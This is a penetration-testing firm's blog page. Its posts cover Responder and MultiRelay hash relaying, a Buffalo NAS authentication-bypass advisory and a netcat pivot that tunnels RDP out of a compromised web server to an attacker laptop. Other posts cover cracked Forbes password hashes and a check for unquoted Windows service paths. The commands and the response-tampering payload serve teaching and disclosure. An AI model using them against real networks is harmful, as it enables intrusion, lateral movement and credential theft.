A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Tuesday, 8 May 2018

From Beginner Responder to Intermediate - Utilising the Whole Suite


Responder is a well-known tool used by many penetration testers since its release. In case you are not familiar with Responder, it is a suite of hash capturing NTLMSSP servers which use LLMNR/NBNS to trick clients on a network to connect to them. If you want to read about using the basics of Responder you should check out the usage section at the bottom of the README here: https://github.com/lgandx/Responder. This article will not cover the basic usage of Responder in a comprehensive manner; instead we will be aiming to look at expanding penetration testers' knowledge of the tool beyond basic command line switches by exposing you to tools and flags/switches you may not have used before. Step by step guides will not be included in this article, however; recommended guides will be linked to.

A second, more advanced, article is planned to be released a week after this article. When it is, it will be linked to here. That article will discuss the adaption of Responder to your network environment for the purpose of releasing Responder's full potential.

Thinking About Responder in a Different Light

Responder is one of those tools that we take for granted as performing a niche attack. Like many other tools, it tends to be used with a copy and pasted command or otherwise with limited knowledge of its true potential. Instead of thinking about Responder as an inflexible niche tool designed to achieve one goal, you should think about how you can leverage the victim's network against them. For example, a writeable SMB share without administrator permissions can be turned into an Empire shell on the domain controller with ease.

The following sections will cover each of the different ways we can extend Responder's functionality and truly conquer the target network using just the tools provided. The next article will expand upon this further, and show you how you can use Responder alongside other tools and your own creations to execute attacks like the SMB scenario presented above.

Tips and Tricks

·         Responder is capable of performing recon of a network drastically quieter than a port scanner. If for some reason you are unable to run nmap on the network (such as an aggressive IDS is present), Responder could help you map the network. Using either the –A or –f flags in Responder you can gather a good amount of information on workstations and SMB servers on the network. The RunFinger.py and FindSQLSrv.py tools can be used to discover SMB and MS-SQL servers on the network.

·         The configuration file in Responder is more useful than you might initially think. Inside this file you can customise several options which will ensure you stay within scope on your test. In addition to this, you can deliver executable files, custom HTML or a custom WPAD script. For example; Empire launcher executables can be delivered by the HTTP module using the custom executable option.

·         The hash files found in logs that are formatted as <Capture Module>-NTLMv2-<Victim IP> can be used directly with John for ease of use. They do, however, generally contain duplicates. The Linux file match expression *-*-* can be used to easily select all of these files and run them all through John at once.

·         The most effective method for grabbing hashes on the network is with the WPAD module. If you aren't familiar with WPAD, WPAD is the Web Proxy Auto-Discovery Protocol which is used to automatically configure browser proxy settings. If an entry for WPAD does not exist in the victim network's DNS server, then you may be able to exploit this. To use this, ensure the HTTP module is enabled in Responder and then run Responder with the –rwFP options.

The Tools Directory

Responder comes bundled with some useful tools, these can be found in the directory named "tools". The most interesting and useful of these tools is likely MultiRelay, and as such it is the main tool we will discuss.

MultiRelay

MultiRelay is a tool capable of passing hashes from two different Responder servers, SMB and HTTP. On its original release MultiRelay was called SMBRelay and could only pass NetNTLM hashes acquired by Responder's SMB servers. MultiRelay v2 can now support the capture of NetNTLM hashes via HTTP WEBDAV. If you have SMBRelay instead of MultiRelay you are likely using an old copy or have downloaded Responder from the old repository. There is a newer repository hosted by lgandx and not SpiderLabs. You can find it here: https://github.com/lgandx/Responder. A Windows version of Responder built in PowerShell can also be found here: https://github.com/lgandx/Responder-Windows. This can be useful for pivoting from a compromised Windows machine on a remote test.

To use MultiRelay, you will need to edit the Responder config file to turn off the services you want to run through MultiRelay. I would recommend turning off both if you are simply looking to maximise effectiveness, if you are targeting a specific service rather than casting a broad net you could turn off all un-needed servers and only target a specific victim IP.

Once you have turned off the relevant modules in the Responder config file, you will need to start the main Responder tool followed by the MultiRelay tool. If you receive any error messages from MultiRelay claiming that HTTP or SMB services have failed to start you have not disabled the respective options in the Responder config correctly. MultiRelay will also check the network to determine if SMB signing is on or off, if SMB signing is on then MultiRelay will not function. The section below titled The Rest covers a useful tool you can use to check for SMB signing on a domain.
MultiRelay has a few different options; the only options that matter for basic usage of the program are the user flag and the target flag. The target should be set to the SMB server you wish to exploit, Domain Controllers have signing turned on for their SMB shares by default so they generally are not a good target. The user flag should be set to ALL if you are unsure of what the Admin's usernames are or you can specify users in a space separated list if you know who has admin rights on the targeted SMB server. The only other flag you will use regularly is the command flag. By default MultiRelay will place a shell somewhat similar to Meterpreter on the target system which you can use to execute basic commands and modules like mimikatz. You can expand this functionality yourself by providing a custom command, such as the multi/launcher output from Empire. By providing an Empire launcher you can effectively spread your Empire agents across a network using Responder.
For a step by step guide on utilising MultiRelay basics and using an Empire Launcher I recommend reading this article: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html.
Example Usage: Multirelay.py –u ALL –t <target IP>

The Rest

In addition to MultiRelay Responder comes bundled with a small collection of recon and exploit tools.
BrowserListener is a tool which listens for browser announcements on Windows domains/workgroups from SMB servers. This is a useful plugin, but seems to be made redundant by Responder's analyse mode which does a better job of the same thing. Should you need to perform recon of a network silently or are interested in identifying SMB shares on the network, this tool or the analysis mode for the main tool could be useful. Whilst this tool is theoretically useful, I have never been able to get it to work on Windows 7 and 10 victims. I would recommend the –A mode for the main tool instead.
Example Usage: This tool doesn't have any arguments, just run it! The image below shows the error encountered when a Windows 10 client sends a Browser announcement.

DHCP and DHCP_Auto are exploit tools designed to exploit a flaw in the DHCP implementation of Windows XP, Windows 2000 and Server 2003. If you are on a network with these servers then you can use DHCP Inform takeover through the DHCP.py and DHCP_Auto.sh files. A much noisier and less effective version is accessible via the –R switch; this is capable of exploiting Vista and above in theory. The arguments for the python file can be identified with –h and the shell file should fill these arguments for you automatically. For the sake of scope and safety I would recommend configuring the parameters yourself, there is always the chance the automated option may choose an incorrect network or similar. This tool will only work on a heavily unpatched network.
Example Usage: DHCP.py –I <interface> -d <domain> -r <new router> -p <primary DNS> -s <secondary DNS> -R

The FindSMB2UpTime and RunFinger tools can be used to discover and enumerate SMB shares on the network. They can be used in much the same way as the BrowserListener tool or the analysis mode for the main program, however, these two tools perform an active scan of the network for SMB shares. RunFinger can be pointed at a subnet rather than a single IP address and it will return a list of all SMB shares on the network. The FindSQLSrv tool can be used in a similar manner to discover MS-SQL servers on the network. This tool does not require any parameters.
RunFinger Example Usage: RunFinger.py –I <target, can be a subnet> (-g for grepable format)

FindSQLSrv Example Usage: This tool doesn't have any arguments, just run it!

The ICMP—Redirect tool allows you to redirect traffic on a network to pass through your own machine. This is an effective MITM technique; however, it only works on Windows XP, 2003 and older. The early service packs for XP patch this issue, which means this tool will only work on very old infrastructures. Use the –h flag to discover the parameters, this tool is self-explanatory.
Example Usage: Icmp-Redirect.py –I <interface> -i <your IP> -g <gateway> -t <target> -r <destination target ag: DNS server>

The rest of the files in the tools directory, such as RunFingerPackets and odict are simply library files for the tools and do not have any standalone functionality.

Summary

Responder is an excellent network exploit tool, whilst it was originally designed to work with just LLMNR and NBNS its many in built servers offer significant potential for use with other tools. Utilising methods like ARP and DNS spoofing or the tools provided in the tools directory, can expand the power of Responder beyond normal. In the next article we will discuss some advanced methods for attacking networks with Responder, such as the creation of malicious desktop.ini files and multiple ways which you can use these to conquer a Windows network.

Friday, 16 October 2015

Security Advisory: Buffalo NAS Authentication Bypass

Security Advisory
Buffalo LinkStation/TeraStation Authentication Bypass 

Manufacturer: Buffalo Technology - http://www.buffalotech.com
Affected Products: LinkStation/Terastation NAS Devices
Affected Firmware: Seen in 1.69 and below 
Fixed Firmware: 1.71
Risk: Critical data loss/access to sensitive information
Vendor Status: Firmware Update Released

General Information
During a client penetration test, SecQuest consultants found that it was possible to bypass authentication on Buffalo NAS devices by modifying the response to the login request.

This allows full access at administrator level giving complete control of the device. Using the admin interface it is possible to add a new user and open the device up for remote file sharing via Buffalo's "webaccess" functionality.

This would give access to all data contained on the device. A malicious attacker could alternatively format the storage or delete RAID arrays potentially resulting in data loss.

Vulnerability
The response from a POST request to /dynamic.pl can be modified in a proxy to allow access using ANY username and password by changing the "success" and "pagemode" parameters as follows:

Original response
 {"success":false,"errors":[],"data":[{"sid":"###","pageMode":2}]}

Modified response
 {"success":true,"errors":[],"data":[{"sid":"###","pageMode":0}]}

Vulnerability confirmed in firmware versions 1.10, 1.15, 1.34, 1.41, 1.50, 1.52, 1.56, 1.59, 1.60, 1.63, 1.64, 1.65, 1.66, 1.68, 1.69

Credits 
Discovered by Darren Fuller (darren [at] secquest.co.uk)

Independently discovered by Red Team Pentesting -> Link

History
16-Oct-2015 Exploit is in the wild, blog post published
07-Jul-2015 Vendor has no update from engineering team
25-Jun-2015 Update requested from vendor
06-Mar-2015 Vendor is liasing with engineering team in Japan
04-Mar-2015 Update requested from vendor
22-Jan-2015 Technical team confirms vulnerability, fix being created
19-Jan-2015 Update requested from vendor
05-Jan-2015 Update requested from vendor
23-Dec-2014 Vulnerability information passed on to vendor
16-Dec-2014 Alternate contact at vendor requested
16-Dec-2014 Vendor response, case reference ID: 0-80368
15-Dec-2014 Vendor contacted via web support form

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end so needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunaely the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 then relays that connection via anther netcat instance to a local listener on RDP port 3389:

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command:

nc hacker-laptop -p 53 -e nc windows-server -p 3389

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Again, proof that netcat rocks!

Friday, 9 May 2014

Lloyds Bank "PCI DSS" Malware

In common with the Facebook scam post earlier we don't usually bother blogging about malware and phishing emails as they're usually handled well by companies and are pretty common.. this email was a bit more interesting.

Had an email from Lloyds Bank <pciportal@lloydsbankcardnetpcidss.com> entitled PCI DSS Compliance Programme:
Looks pretty legit.. PCI too, that's a security thing isn't it!  The attachment looked like this:

So PDF icon with a .scr suffix. That's a Windows screensaver file which will run the code the same as a .exe when it's double clicked (for our younger viewers).

Basically it's a known piece of malware with reasonable detection according to Virus Total:


Interesting all the same, obviously targeted at business rather than end user targets. Be vigilant!

Wednesday, 9 April 2014

Trend Micro File Harvesting

Going back a year or two we blogged about Microsoft's SmartScreen filter sending potentially sensitive file information to Microsoft's servers who download files after they've been downloaded by Internet Explorer.  If you're putting super-secret-file.zip on a server for someone you probably don't want anyone else coming along and hoovering that up!

We've recently become aware that some versions of Trend antivirus products do exactly the same..

Sunday, 16 February 2014

Forbes Cracked Passwords from Feb 2014

Did a really quick analysis of the Forbes password hashes leaked by the Syrian Electronic Army earlier. From the 1,071,734 password hashes that hashcat recognised as WordPress, 2713 were cracked in about 30 minutes.

There were no switches, GPUs, rules or anything used.. I just used the unedited top 25 passwords taken from the top 10,000 list published by Mark Burnett (xato.net). -> blog post here

The results show that 975 people have 123456 as a password.. some things never change! Top 25 cracked hashes follow:

fully@SQ:~/hc$ cat forbescracked.txt|cut -d : -f 2| sort|uniq -c|sort -r -n
    975 123456
    534 password
    159 qwerty
    147 12345678
    146 abc123
    111 111111
     75 letmein
     66 monkey
     64 baseball
     62 1234567
     50 shadow
     35 michael
     32 jordan
     31 dragon
     29 superman
     29 master
     28 mustang
     28 football
     25 harley
     23 jennifer

     22 696969
     21 12345
     18 1234
      2 2000
      1 pussy

Thursday, 16 January 2014

Microsoft Windows Unquoted Service Path Exploit

It's been over a year since this Windows issue has had credentialed checks available in Nessus and it showed up again on a recent test. If you're not aware of the issue http://www.commonexploits.com/unquoted-service-paths/ has a great writeup and is referenced in the associated Nessus plugin (Nessus plugin ID 63155)

In a nutshell this vulnerability is due to some Windows paths for services in the registry not being "enclosed with quotes". Believe it or not but when Windows sees the following: C:\Program Files\Test App\app.exe it tries to run the executable like this:

C:\Program.exe
C:\Program Files\Test.exe
C:\Program Files\Test App\app.exe

On the Common Exploits blog Daniel has given us a handy command to check for vulnerable services:

C:\>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

I ran that on a system and got the following results:

CorsairSSDTool  CorsairSSDToolBox  C:\Program Files\Corsair SSD Toolbox\CSSDT Service.exe  Auto
Internet Pass-Through Service  PassThru Service  C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe Auto


Metasploit has a privilege escalation module to take advantage of this but I couldn't find a simple standalone way of showing a proof of concept for this issue.  Taking the easy option and copying cmd.exe to the path fails to execute as it is not a proper Windows service application, we decided to write our own service to demo this!